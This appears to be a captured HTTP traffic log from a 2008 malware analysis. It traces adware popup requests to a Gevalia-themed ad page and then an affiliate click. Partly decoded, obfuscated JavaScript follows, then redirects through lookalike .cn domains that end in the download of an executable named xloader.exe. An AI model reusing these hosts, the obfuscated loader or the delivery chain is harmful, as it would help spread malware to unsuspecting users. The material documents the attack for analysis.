POST /vomba/popup.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Vomba Host: services.vombanetwork.com Content-Length: 366 Cache-Control: no-cache Cookie: __utma=... hwd=...&ac=202&sac=1000&ver=1020001&pop=8&time=...&his=uid:...|--&keyword=www.gevalia.com|image|home|gevalia.com|gevalia%20com|gevalia|&trigger_domain=www.gevalia.com&trigger_url=%2FGevalia%2Fimages%2Fcommon%2Fdot_clear.gif%3F%26mid%3Db4fZXZnQ%26ptid%3DHOME HTTP/1.1 200 OK Date: Sat, 11 Oct 2008 06:32:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 P3P: CP="NON NID PSAa PSDa OUR IND NAV" Set-Cookie: ... Content-Length: 1303 Content-Type: text/html; charset=UTF-8 1 1 1 1 0 1 0 1 550 750 0 0 http%3A%2F%2Fwww.doubleyourctr.com%2Fgevalia.htm 0 ... ... iadv10178 http://mediatraffic.com ... Mon, 10-Nov-2008 5:32:50 GMT 0 3 -1 -1 -1 -1 NORS GET /gevalia.htm HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.doubleyourctr.com Connection: Keep-Alive HTTP/1.1 200 OK Date: Sat, 11 Oct 2008 06:32:50 GMT Server: Apache Last-Modified: Sun, 21 Sep 2008 16:21:44 GMT ETag: "3dc208-4ed9-48d67498" Accept-Ranges: bytes Content-Length: 20185 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Please wait.. GET /afclick.php?o=3882&b=x2mhm0x0&p=9136&l=1&s=tm HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.lynxtrack.com Connection: Keep-Alive HTTP/1.1 200 OK Date: Sat, 11 Oct 2008 06:32:56 GMT Server: Apache P3P: policyref="/w3c/p3p.xml", CP="NOR DSP COR ADM OUR" Set-Cookie: afclick_3882=1223706776%2B3882%2B9136%2Btm%2Bx2mhm0x0%2B9f2b09a0-e8ae-102b-9f5a-001372fd42f8%2B1%2B0; expires=Sat, 11-Oct-2008 08:32:56 GMT; path=/; domain=.lynxtrack.com Connection: close Transfer-Encoding: chunked Content-Type: text/html If this page does not load please click here. --> decoding and partially reformatting a portion of the encoded javascript found above function zhjI(fuJ){ function wXul(eIfHsa){ var tmDC=0; var ilpI=eIfHsa.length; var iHUzIn=0; while(iHUzInggx.length)yhqI=0; if(zifvHGv>zsQzva.length)zifv% ... GET /bizhost.cn/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.doubleyourctr.com/gevalia.htm Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.doubleyourctr.com.2d6a235d6093b2a6.axa3.cn Connection: Keep-Alive HTTP/1.1 302 Found Server: nginx/0.6.31 Date: Sat, 11 Oct 2008 14:26:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Location: http://www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn/myspace.cn/index.php Content-Length: 0 GET /myspace.cn/index.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.doubleyourctr.com/gevalia.htm Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Connection: Keep-Alive Host: www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn HTTP/1.1 200 OK Server: nginx/0.6.31 Date: Sat, 11 Oct 2008 14:26:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Content-Length: 1155 GET /myspace.cn/load.php HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.google.com.br.updatesoftware.index.d81f0f02cd6a877358cde8fbdbad89a5.qwertycn.cn Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx/0.6.31 Date: Sat, 11 Oct 2008 14:26:11 GMT Content-Type: application/octet-stream Connection: keep-alive X-Powered-By: PHP/5.1.6 Accept-Ranges: bytes Content-Length: 13312 Content-Disposition: inline; filename=xloader.exe MZ..................@.......................................... !.L!This program cannot be run in DOS mode. ...